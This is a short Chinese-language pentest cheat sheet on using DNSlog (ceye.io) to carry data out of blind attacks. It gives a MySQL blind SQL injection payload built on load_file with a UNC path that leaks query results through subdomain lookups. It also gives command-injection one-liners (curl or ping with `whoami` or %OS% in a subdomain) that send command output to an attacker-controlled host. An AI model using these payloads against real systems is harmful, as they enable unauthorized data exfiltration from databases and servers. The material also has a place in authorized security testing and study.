利用 dnslog 回显
Contents
DNS 在解析的时候会留下日志, 通过读取多级域名的解析日志, 来获取信息
简单来说就是把信息放在二级域名中, 传递到自己这, 然后读取日志, 获取信息
利用 dnslog 可以回显 sql 盲注的数据、命令执行的结果等
知道创宇的 dnslog 平台
ceye.io
登录之后 右上角 Profile
Identifier 就是 dnslog 测试地址
访问 test.xxxx.ceye.io
后台 dnslog 记录
SQL 盲注
以 mysql 为例
load_file('\\\\xxxx.com\\')
可以发起网络请求
记录
盲注
and if((select load_file(concat('\\\\',(PAYLOAD),'.xxoo.ceye.io\\abc'))),1,1)
因为不能直接 id=1 and select xxx 就用 if 来执行
PAYLOAD 记得写上 limit
命令执行
linux
执行反引号内的内容并作为结果输出
curl [反引号]whoami[反引号].xxxx.ceye.io
ping [反引号]whoami[反引号].xxxx.ceye.io
dnslog
windows
感觉鸡肋啊…
ping %OS%.xxoo.ceye.io
%OS% 操作系统名称